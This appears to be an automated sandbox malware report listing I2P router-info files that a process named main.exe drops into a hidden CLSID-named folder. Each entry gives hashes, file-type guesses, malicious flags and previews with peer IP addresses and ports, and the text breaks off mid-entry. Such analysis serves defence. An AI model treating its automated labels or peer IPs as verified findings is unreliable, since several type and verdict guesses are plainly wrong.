C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r9\routerInfo-97lOAN92WirMsgizQIjrjc~Uv3pUgvylI2aNbr1RHWI=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	807
Entropy (8bit):	6.806066744332605
Encrypted:	false
SSDEEP:	12:XSLPk2xI2xI2xI2xI2xI2xI2xI2xI2xI2mEY/fmRlruf358jTkZZT+WW58loAPDe:CDlfffffffffmh/vfSE+WjloA7/DTOJ
MD5:	0645F7DBB35C9C7664E0BAE69427B0A3
SHA1:	9D3051A08E8A4C08B2F6E0C55FC798EE29B6ADC4
SHA-256:	A9469BBBC1200B714AA90C826283DAC33CC88575AE849D297EEE17C42012C101
SHA-512:	BB1FDADF1FE5FC674BC60998CB08C0CAF62E1D1CABBB3640737EAD6965AF34BF31BE717E262C36D64854E1F4AA2AEFE59FBB7F5EA509469952B8BAB33740B610
Malicious:	false
Preview:	.^.4...YL......>..`[..[z{..w..+u..1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...R..Vb.=o....H.(..c..L...>P................_...........NTCP2.u.host=.190.22.24.78;.i=.CAIN~oMBhZ2IK4LXX6sTSg==;.port=.33037;.s=,LULdKdNGySVbJnylcZCA8C-jkVlDP0iwyLMtvKRHZnA=;.v=.2;..........SSU2...caps=.B;.host=.190.22.24.78;.i=,oZ1psWkb2jVLpAOZCOX6tP~9ZnfZ5e8PHMchZ9Lj09U=;.port=.33037;.s=,YVG8FG4ro6pc2jfPgJBXlpXl5OORBrIL57Bkc2E8cVY=;.v=.2;..,.caps=.NR;.netId=.2;.router.version=.0.9.63;..\N..".EF.x......m.x..Xr.~C...S......?...9..gX............4..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r9\routerInfo-9Apycr5e8bjQuA8OUWurYoTvhl0zYFYTJEVsQhpMDo0=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	COM executable for DOS
Category:	dropped
Size (bytes):	808
Entropy (8bit):	6.600197451286896
Encrypted:	false
SSDEEP:	24:WzzdzdzdzdzdzdzdzdzdztHBooF9wWbbAAOykpP:WzZZZZZZZZZZBoGWMbApP
MD5:	6172C16E38F5D1AE995D87567CA54634
SHA1:	37968CF5892F5FDBC77A4FA0A57FB123106F2AFD
SHA-256:	1ADD354677601E0EF2DF96BDBBD04E30236D7A6ED5F42964AD381D903153DFF1
SHA-512:	64D1D7CA47964AB98B83BDBF11DF35A6FA280A1DFE0486CF0506AA3764938E3FFBEF9D9516114DF22A980AFDDA8F6C634DB17F604B8DE79C06FA9450FD2205DD
Malicious:	true
Preview:	.;.1..{p9Y.x$.....%u..,./<...di..M.M.ay7..p.B.....g..LP.z....M.M.ay7..p.B.....g..LP.z....M.M.ay7..p.B.....g..LP.z....M.M.ay7..p.B.....g..LP.z....M.M.ay7..p.B.....g..LP.z....M.M.ay7..p.B.....g..LP.z....M.M.ay7..p.B.....g..LP.z....M.M.ay7..p.B.....g..LP.z....M.M.ay7..p.B.....g..LP.z....M.M.ay7..p.B.....g..LP.z..c.h...K....9/.7=..I6l.p.n.X...............1...........NTCP2.u.host=.5.19.249.240;.i=.ZTajYRcLK4edCLzUqe53aA==;.port=.19209;.s=,8U4Ie0QTlH9OMDRdpoCe~6~mLwhZiQQuIn2XvNNdNQw=;.v=.2;..........SSU2...caps=.BC;.host=.5.19.249.240;.i=,oDORHO0npVzpYLrtU3lZvz5PHUYwiS-Vjs~pt4rU5D4=;.port=.19209;.s=,2kBVmOmtU4znCA~jz4iRapY8wg~hq1Li3bjedm-CfC4=;.v=.2;..,.caps=.PR;.netId=.2;.router.version=.0.9.58;........P.....F..p\.4?..YP7.U.....Ho..z.G\.~.......tmtQ.....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\r9\routerInfo-9l5Z43GUFIZTS59VNXQznqMpP~~B5ICTdtbhy7EcK3I=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	780
Entropy (8bit):	7.35720864233346
Encrypted:	false
SSDEEP:	12:dVI/D1YVo9HClRg4kHbT2RtUEqPojukWm+e9D9EmC3BsNR5P6heWK7t6X1:XxVoVeiJeaEqPojsLoDqUf5PKao
MD5:	FBA700CB3BA5D0839C42ED8A744C5F93
SHA1:	6FFA19DBF2424C6ADC94365B0B277E99E3247BBF
SHA-256:	603E743583AE2781C123476209E960DAD4820294E24CB5AAEBF21A53AE980259
SHA-512:	60EF267B3E057057E088060B2157EAB96C6A04D82436F447662EFA594AEE9604B7C0BB5F516DD3DCAA8A161E6C3972FCF1F28ACD89C9918021CB848FAA7A941B
Malicious:	false
Preview:	Wf./.R...\R...mI..d.A...O.B.e.Dm..i.......y......6...N....C../.^V..>i.2.cm-.[..E..`.]=K..].UO_=..x..".n..zW4<.....;[.Y.}..D9K..%....R..E.J.[+..<y^i..."...+7eR..v...9..i..........W&...i,.E..L.X.....C.._.].1.L.7."..y....o.....'.?(..."JvM.k..O.'.LG......,..G.cS...B.L#.8....5..A....^...<.w..6.A6:.K..u.{....~.[V.3.`.Q5:.R.u..X4.....Z. ..y.Z..Yt...7...K....X.2...^.........................SSU._.caps=.BC;.host=.116.240.52.76;.key=,-u2RlpXk9D46CHwrOeXXYsV7I2SUNBJKVzarBeeKceI=;.port=.38481;..........NTCP2.v.host=.116.240.52.76;.i=.RWOCXnL6l5-f7VHj2G6leA==;.port=.38481;.s=,Q6uqRT3Ap-dZ~lzKVNcy6Th-w7qGw1Kw31ucPsUMlX8=;.v=.2;..........SSU...caps=.6;..,.caps=.LR;.netId=.2;.router.version=.0.9.51;hA..B<..Hc..#....Nj..F.nD>..{....B.D..L0C.q...a..gk.......6v.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rA\routerInfo-AGbROvoSfu-IsDVBKTwkEX2auTUVrYxCHxMxhU27LXs=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	813
Entropy (8bit):	6.678025829966118
Encrypted:	false
SSDEEP:	24:4r/i/i/i/i/i/i/i/i/i/pfGRpcSxR1z/Aac:3fGzcS/4
MD5:	5C517DBF9FE6D9B8E7823EAE97F8024C
SHA1:	59F48F64E2F02DD002661AC8ADB6465FEB77C178
SHA-256:	82C217F003D6595508A886F007D12B4475760DA7F5DADB721838317CF693C2E8
SHA-512:	2FA73FED33A3B5A7AEA4BFB67B9879BAD9B323513275BC4D64826D5A2C68C36DB66460DB9FD89BADAEA75CD4298B6F2F0D031D03AAAF86564CAC3FAFB220E7FB
Malicious:	false
Preview:	30u.dg.;.L.{..nc-fy@......K.t[-@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.C....lJ.g.6.R...P.]......Q...o...............P...........SSU2...caps=.B;.host=.213.145.125.139;.i=,vaaVnYyXy-bNKio-2eqv84QR8EWml2cMQRiKy4ERe7c=;.port=.21689;.s=,KR6fIOSXDIEDr4qDcF~7D01HoISsZfH9gk4t-pjHxyE=;.v=.2;..........NTCP2.x.host=.213.145.125.139;.i=.jPXGebAu40CGoQJXUj-C6A==;.port=.21689;.s=,GrBH7~vgI1CAp9QPrMbAhpbDliWYozJejQK~7-z-YRc=;.v=.2;..,.caps=.XR;.netId=.2;.router.version=.0.9.63;.'...\.....J..-6;u.8f.E..........2..0}.g}Z..o.......;o.).g..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rA\routerInfo-AwKAc2d1mur1hziBN9y~c~A4hScNyCgiCmbJVgZdZjY=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1351
Entropy (8bit):	6.609906999218422
Encrypted:	false
SSDEEP:	24:YnlmPmPmPmPmPmPmPmPmPrSExixmbE+pL4jEbEge7nrv/7ZOb2nhdL4jcsQe0hca:YnlmPmPmPmPmPmPmPmPmPr1V4jQY7rvJ
MD5:	99578C2FF77B9A6817E1F45DE8E96BFB
SHA1:	0EA12A979EDCDC49F74F9DEE15371A4EB2182340
SHA-256:	937ECBC11C66E658071F1172B8CED9CC26A95A89A85345B122BA684BF8703E51
SHA-512:	6D2A8940EC895E7FE5A84194DAEA5DB0C5FD78F5BA189F2C95C9F9CDB4929376FCBE775B4E7260A08E424DAF0240E341BE634B7F5D3A7450E1C0EA32883C394F
Malicious:	false
Preview:	l.Oo.g.\|..t..a.x...@...y.f.I.\Gl4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.l4B..Z#..@.n.a..(.qa..@...z...V.a>..@&.K4*...\.&.q.....................................NTCP2.v.host=.24.70.217.209;.i=.ZUql9fMaOgSH320ByI4jwg==;.port=.15318;.s=,XNO6Agv3Vr1I~OfE4twr1HfJNL7vNPqlPF-rWQrv2RE=;.v=.2;..........NTCP2.@.caps=.6;.s=,XNO6Agv3Vr1I~OfE4twr1HfJNL7vNPqlPF-rWQrv2RE=;.v=.2;..........SSU2...caps=.BC;.host=.24.70.217.209;.i=,WFd0sKoQQCnJhEiRYWwBrYlaTS2bWsSZWNH40~aM~e8=;.port=.15318;.s=,VrSCUqtreY3EPYg~7hotq5IfXNsQsqBgxDLjMVV1Who=;.v=.2;..........SSU2...caps=.6;.i=,WFd0sKoQQCnJhEiRYWwBrYlaTS2bWsSZWNH40~aM~e8=;.iexp0=.1726480601;.iexp1=.1726480614;.iexp2=.1726480634;.ih0=,Ijovj6ZyBBHfPdzIqnQ~FcQReznm4wdilJ2jWugnf4U=;.ih1=,ImQCa~41bzppySTUmrtpGpJekB4e5o9r

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rA\routerInfo-a1S6gGK5P8L0oHzN4RauTU7WB5uLA6S0YiqtUT--kyk=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	813
Entropy (8bit):	6.705097401916861
Encrypted:	false
SSDEEP:	12:h+9AHm7Hm7Hm7Hm7Hm7Hm7Hm7Hm7Hm7Hm/9dfhfMLCNqzwp8oeDQACLqCtjn:KyyyyyyyyyFdpULCQzwLMQD1R
MD5:	60B96FED011F8B025F1899BDC6E4CE39
SHA1:	9FB5595D776880798E6D8A4ED1AC09160A06138A
SHA-256:	A43D034E20E3CED078115E0E1A4707760EDF3E0601698831F77D1F39F4E0038F
SHA-512:	C5DBD592DEC741F59A6B917E80714ED4DCA1C78AF855373613BADC8E9B1A30BED437DF3CB20DB21660849AACE85C6172A5E3024131782B1352B8C19B818269F9
Malicious:	false
Preview:	Hi..Rz.tiz+f........u.=._.........0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'....0.C}..s...9.2..((:Yt....'...1...c. ....[..;.......;Ja..................!;...........NTCP2.w.host=.47.250.187.161;.i=.oQpvr-SpcZmgbEyWfipV5Q==;.port=.27292;.s=,VsE-CucwCWb3WN2Tnb6a8JYL7B7tpQCJZyym0noytnY=;.v=.2;..........SSU2...caps=.BC;.host=.47.250.187.161;.i=,Yxx6C4wBBV710j3U~fEjX0vy11irWDab1UDJQvgXqog=;.port=.27292;.s=,ZnUo7CsfJvDAYnuedGGhgRID0OhaFEqjuPPdURp81WA=;.v=.2;..-.caps=.LRE;.netId=.2;.router.version=.0.9.63;..h....v7=......%4...4n7......o.........L+.M.eKt..Y.\......

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rA\routerInfo-ahQNZDXqMm3Fglih9or8SWXz-cdw2MzY8w2oaRccHYE=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	808
Entropy (8bit):	6.618602774558439
Encrypted:	false
SSDEEP:	12:sk8nJJJJJJJJJcz8yfgeaiFsUJHzjuj8VYz/K:FD8yfgczqwVe/K
MD5:	13FFF422601D369AFEED5DA495E62C52
SHA1:	398A32E5F1CA0B1EC12BBA814FA33A525BF2F429
SHA-256:	FC9415C2EC28AFEB16BEF8C3DCA3EE3137EA143984530ABCAEAF75A8CD37EF6F
SHA-512:	CE66050A7B25A45DF04B052B3D8EE4B41B2563BFA047E496C32DC9AA73AA0601A1A366403A85EC92410D97DC5EF5622C1F4FA3DAC1097709708BFE12A20A9435
Malicious:	false
Preview:	..B......:p......i....,8.G........P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G..P.8.-....S.5......&.n......G....~9...VE.mm..Bm:...5o..LU..~..........................SSU2...caps=.BC;.host=.92.95.33.134;.i=,PF92~R9-d47rxbszpg9wuAaTGXHh~Z1Q8ynKl40W2vo=;.port=.38552;.s=,Iruqpd4WqAb3D~9ak5cI48n0ixl1k1B6j5lm45252C8=;.v=.2;..........NTCP2.u.host=.92.95.33.134;.i=.YhUz0XXiYyaVUUFJJNq4qw==;.port=.38552;.s=,8S15DBkB9jBc5Vu6kGe3EyO5YFVFafFYNYW4JODZ7wU=;.v=.2;..,.caps=.XR;.netId=.2;.router.version=.0.9.63;..B....y..W..Y<..V..-.....w.$..q..z.....B........@.~..;..e...

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rA\routerInfo-ax-O~C-rTc5a6K0273QHfg7DS6ehPjya9PVrb6E5phk=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	988
Entropy (8bit):	6.633110337562871
Encrypted:	false
SSDEEP:	24:/CRRRRRRRRRMkkYaLXf8eYgqXPub6+E8aXM:/3DXf8epq2+oAM
MD5:	32471EDCA6D92DDA2698A3D14D672064
SHA1:	3516539ABEA3293A1D8A54FCE217B49C46812738
SHA-256:	077B16227E723B6806C37F8FCB7405685D1D64B761E33E2FCAD9B1C4CFEB0006
SHA-512:	A86B41EBC10EFA17A6EFFA213EFA3CCDEDFA702235012338BEECC7E68AA2584D0D002DD5A488F58BD6A239A85BA248C9972A9D63B509E98882C89488D655FE7C
Malicious:	false
Preview:	.....*q.B.f1.'...OJ..T.{..]r...6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5..6..L..K.....,...U....w.5..1x5...._..")..n...1.u.x..q.n.0.=Q..N..........................NTCP2.@.caps=.4;.s=,IAyA~7yXHz91KqnHjzsMYUpsqR8wcww3VDIGh02rqxg=;.v=.2;..........SSU2.\|.caps=.4;.i=,5wWPICrp-yX7AC~Quo~izVRWzEZzJgAYsmp774m20VQ=;.iexp0=.1726477015;.iexp1=.1726477673;.iexp2=.1726479338;.ih0=,X9HFLg4WWC6prjzNKrp22BKdk6bNZNkML8PyMBYLIyg=;.ih1=,GIEXCb9OkV3aTUpTW1GKBMR5M0uY73Yffw5zi4IE9~A=;.ih2=,nJ-x~yftl3KzDbBCpv~gwLrea0yiES73fW3qdxch~7I=;.itag0=.2134427794;.itag1=.3081442362;.itag2=.2781506574;.s=,UhF1NcSuopTCBttHHxsJhkhTR6ahx1iIEktLk-VZD28=;.v=.2;..,.caps=.LU;.netId=.2;.router.version=.0.9.63;...X.O.A>....\A.X0.4...ru..s2D..D\|.JkDQ...40?....._.K\|.?..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rA\routerInfo-a~6MUDxrhoXLKT7ItDbM0qAH752LKob1FTjrrVLm64o=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1410
Entropy (8bit):	6.710701090330378
Encrypted:	false
SSDEEP:	24:A599999999VamLi4er6cuLPer6Y4LOgCo9OC4LOgConRy4PJR2xdQR:Az8BXL4UE4Uq9sdI
MD5:	27DAA454EA4225E45486D0B833A6BE1B
SHA1:	302B6521964A72D725B8C8D22E3B97AE8EB4314D
SHA-256:	10E6FA8A43949783F84974CB461008B0F115E767D5CF6FA128A9332C1A47A07B
SHA-512:	17C51F8BB52B04243FDF9DC555A25D3C069D6760A7DCEC1B1D47765E1D7062B85BDDAB9351814EFD63542CC76178B4AD2A9D48C1F1BA151FF433D6DCFF46880C
Malicious:	false
Preview:	.. B.c.N.0....ZGrl.#....I..u...c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X.c.@.duV......AG.5}.3b......X..ik6..O.v.D}.c..../\.....d./.........................SSU2...caps=.B;.host=.2001:470:b5ca:0:0:0:1:2;.i=,7EFgK4864CEcE0mRtRbziSmvZoSC5zACcjUYCeRlZOc=;.mtu=.1420;.port=.25314;.s=,ys5DF5SZKRj06wDZnk7nxJRJpMThhGYMWcKsw-SJ4hw=;.v=.2;..........SSU2...caps=.B;.host=.88.210.6.42;.i=,7EFgK4864CEcE0mRtRbziSmvZoSC5zACcjUYCeRlZOc=;.port=.25314;.s=,ys5DF5SZKRj06wDZnk7nxJRJpMThhGYMWcKsw-SJ4hw=;.v=.2;..........NTCP2...host=.2001:470:b5ca:0:0:0:1:2;.i=.SYZdmId6kKGi~3thK62xHw==;.port=.25314;.s=,T9jNNBJ58G20f1rU7LIeNHCnWxDFjXn8~S1~nKI2iDQ=;.v=.2;..........NTCP2.t.host=.88.210.6.42;.i=.SYZdmId6kKGi~3thK62xHw==;.port=.25314;.s=,T9jNNBJ58G20f1rU7LIeNHCnWxDF

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rB\routerInfo-b8yyb2Cd~7xXj32zhXcGRr7tTecU7wLwKKhZxSIGClo=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	867
Entropy (8bit):	7.3429915190375485
Encrypted:	false
SSDEEP:	24:5r5QQiOW6iWq8mAHNhqbv9a/hjYFsEJT6LgIT1EDscKAu9a:N52arqChqc/hjY76s4cLu9a
MD5:	98FF7EED5D3FEFF8505B49A9AE82A89C
SHA1:	3C12A161294673EB7D203B523AE394362978DDA1
SHA-256:	D339CF29FD0C744325B709093E9F7C6A2CC6536EEDFC54FF8FF46885B31DC1CB
SHA-512:	299B85435C4BBB453543C5C2055995E639796873EF464AABAA9D9CF45354F0D2E18CDF38858D492D30BB8EAC0BEE4D5FF3D0CB753F5DDADFD11A9D8C353D9AC4
Malicious:	false
Preview:	..`.A.+p .O/..c....&/.(t..5g/......E..D.....g.."`...I..(..3>e\|.'.yf...T....Rc...B..P...c$..Pc...M..%.Y>B...n\|.].H..V.#p]..;.X......lMy....q..,.A..p.QZ..H.....OD....h.86c.n.......}.v/...Si....S..D...H..._Y...~.g..Yn.....8X>.P....R......J.O..r.....T=.ZED.$.....'y1tE\|.N.....N.;h/..2?.#S.I4=...dX..(.<..bN.......pc..{.....y..r(}..q.4......8..K.>".J....J..%...z'..............c...........SSU2...caps=.B;.host=.207.178.119.175;.i=,93D7P-3uYzcOAchvE9L-BkG7sfrhOLY-JAF9ebnze3k=;.port=.29260;.s=,zRqCNdC28r45dm5hss1PLgwV4SanW0u7j-zM7LSPT3Q=;.v=.2;..........NTCP2.x.host=.207.178.119.175;.i=.AQQR9XzwZfWscEtM8qdk~g==;.port=.29260;.s=,~dDAdwubX6dqaU25pVUFCQbC-xzWbqIVv5o9afYr8E8=;.v=.2;..b.caps=.XfR;.netId=.2;.netdb.knownLeaseSets=.522;.netdb.knownRouters=.5742;.router.version=.0.9.63;,...0.........@........Z...C..A.. .e..'TP....n...?.[.x....\U.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rB\routerInfo-bALDnrW3eGIatSnutDK94iZqTnrBy8xaS310LeCsiiA=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	752
Entropy (8bit):	7.435572493757363
Encrypted:	false
SSDEEP:	12:QcJoVRj86/OKne5b4yLaxoE3T6DoOxyLHZLBZalmghuxyLqTFbUisM5PbkP:TiVFOGmb4yWxoSmkOG5FZaZsGqTFbUJb
MD5:	90BDD109A4C4BA22E4F319BB26876EE4
SHA1:	A528C8C4BD31A3131EF70CCA05E505D5D6DB782F
SHA-256:	3E7AB6F3E7BB422E58D5306EA6980BDAEE20B2F68718AD881FA91AEA3F1A92BC
SHA-512:	6AA866234FB56132B4D437A203B10A0D8EFC5B42A4920D0EA40BC043867435BFD7EF8D9AB217E7C7BD4EED596F3587473427F6CBC45AB52D855429953E7219F9
Malicious:	false
Preview:	..+T...1$P..R!Jv9ekng....Z..5..&....D..C.g<.J...U.y.?.6.q!.....I...+.P.T........c......n..."$]....P..X..?.}.2.<.1.?...I...[..8;P$.0._.e....^....1.S...D+-..N....$Q.<..J05@..y..@H..3....oku..Y..7...d...U..r.5..j.pv.o.u..........P.XG......]....$.}.~"o{.....O.Am../ER.P.a......).....!.V.,H...aj.8f...\|..qj....,.-....]...*.@.<...Q..._o.,..A.N....8\....O..U...E..N..7P................................NTCP2.t.host=.79.36.34.44;.i=.D9MW-eU2vSM8QMoXIJwphw==;.port=.26576;.s=,0wSf0bLK-3UFSzSW79xE0-VvMYWwd9xy7BvL2wGNKzA=;.v=.2;..........SSU.].caps=.BC;.host=.79.36.34.44;.key=,t1QmZ~9QLYVq54Ob-vkmLJlHqcE0qePvWFv5snAy96U=;.port=.26576;..,.caps=.LR;.netId=.2;.router.version=.0.9.48;)... cn:QQ.&...I....y.a@...g.a.....>....p.I..O...V~.3..R7U....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rB\routerInfo-b~OYpK0fNqrCjt9-txuaFIduqv5ViHJBQ2YG4G6jl6E=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1296
Entropy (8bit):	6.655642820325174
Encrypted:	false
SSDEEP:	24:wjY6/e/e/e/e/e/e/e/e/e/wIylbim87KHgemH7K9Cm/ql+:H4iHewKt
MD5:	EF9D8E387F2DAD8AF9D38E86B74EDE49
SHA1:	C2E3912420810DEFAAE03841EC5895683A0C7A9E
SHA-256:	EEB030B521A32AEDF1D65DCB73CDE1CB6CE94B3CD95DE0FF6B729BB32097BD1C
SHA-512:	5B8EF2E0140856F45DA62D99EB560FF351B5664AB4BB7C157139B31354ED6E036B3BCEAC8174648E81CF66A10F47E269866808922551DCA89AADABD4061DB7E7
Malicious:	false
Preview:	...i....u....Y(eG...!t.X.&.8n,..l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f.......l..F6-KS.+!.......4;A...f..... .c..V..U..ey.4.....t..).Jj..............................NTCP2.u.host=.85.239.53.47;.i=.RIVGkh3MZqu~jAnj-Etv7A==;.port=.28583;.s=,UXiZtxDPm6YzGAKIPlSDGToiNHs8LBuhekRUlNoKaTI=;.v=.2;..........NTCP2...host=.2a10:1fc0:6::81c4:78e7;.i=.RIVGkh3MZqu~jAnj-Etv7A==;.port=.28583;.s=,UXiZtxDPm6YzGAKIPlSDGToiNHs8LBuhekRUlNoKaTI=;.v=.2;..........SSU2...caps=.BC;.host=.85.239.53.47;.i=,8CdrtN4xnFO4NeHH32ZTciCf8XQrQXMoLr~DHkfUjVU=;.port=.28583;.s=,aBPP88pRdS3hrM1-weaez3R4er1OzpjUQtk4SY1VJzc=;.v=.2;..........SSU2...caps=.BC;.host=.2a10:1fc0:6::81c4:78e7;.i=,8CdrtN4xnFO4NeHH32ZTciCf8XQrQXMoLr~DHkfUjVU=;.mtu=.1500;.port=.28583;.s=,aBPP88pRdS3hrM1-weaez3R4er

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rC\routerInfo-CVE7qh1P~hZ~PX2FDY6wRTmrdDd1eQ5Nv7yBC0EcH-o=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1250
Entropy (8bit):	6.719354937553381
Encrypted:	false
SSDEEP:	12:c6vtQGGGGGGGGGIJZya30IXdc30IX94X9gSMJe5Uth4mNaU/WDRw3E41rsAyVXa7:52ZjcqmRJeHoWuUoHyYm/kGym+3vg+VB
MD5:	1C55E8F8C0CF5F40932A0A5E123D7950
SHA1:	2B8E590BFA163C92AD9CD88DD6351C1F7A616D51
SHA-256:	D8602CE05C4B1BF36F8B9621C8A71899141A258A6E56880171F02F80B96873C9
SHA-512:	985E88B0D928B6C6A943A38184CF4D95FD9D2D528859B34D3FD5BB04D3613C682CDDE295D89D653C9CA41749E27C7560CA745136998C1A91343496331B0E4225
Malicious:	false
Preview:	{._G*....'....(%..._.{...(..S(.K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n..K..q..6..0.....B...~_....n.`.=.p..>.q.l4...L/?.I....................@............NTCP2.@.caps=.4;.s=,gkySiDzPCt-U5KHwT8o7jD9Hz~AcG0k5WFTzeKGtPkw=;.v=.2;..........NTCP2.@.caps=.6;.s=,gkySiDzPCt-U5KHwT8o7jD9Hz~AcG0k5WFTzeKGtPkw=;.v=.2;..........SSU2.\|.caps=.4;.i=,cuBDhbS7~cxNNoi~00PWtVh9SSymUQN2LO4pleubWpk=;.iexp0=.1726478698;.iexp1=.1726478698;.iexp2=.1726478698;.ih0=,6D3~2RiWXlayHWUm~GTaI2YyqAkCmC3LBnRwJ~kUMME=;.ih1=,SpvwbPM5c2GAKg5qplOg7KwA0RFu5QAxIsFRiqz3Amg=;.ih2=,9WtkDax6dCaFddiXsln9VDxIq-dR-1vfOqctU48l9Z4=;.itag0=.1738221619;.itag1=.3308870456;.itag2=.3524311204;.s=,Pk1Ate9i2H3NZ15sqDyQLGwCSb6uV7KtSW1TKPir-w8=;.v=.2;..........SSU2.q.caps=.6;.i=,cuBDhbS7~cxNN

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rC\routerInfo-cFFCtwAX26CBLQCzLXjAEH6XNullf5GV52RHet9XTO8=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	988
Entropy (8bit):	7.206526544467207
Encrypted:	false
SSDEEP:	24:1riQz4YVyAwlsNEfShCB2CtOGP8QbRzsj:xYAwlsNkShVv
MD5:	8ECBF6356B36F8029AD6B74D79F53532
SHA1:	CC3517F6895EEE8B6DFDE1ED551BA01319B7C41E
SHA-256:	6EB165FAE619E27CE3B2B1CDF89C25A0D2698CACDF8CF6616C8714AAFD5D703F
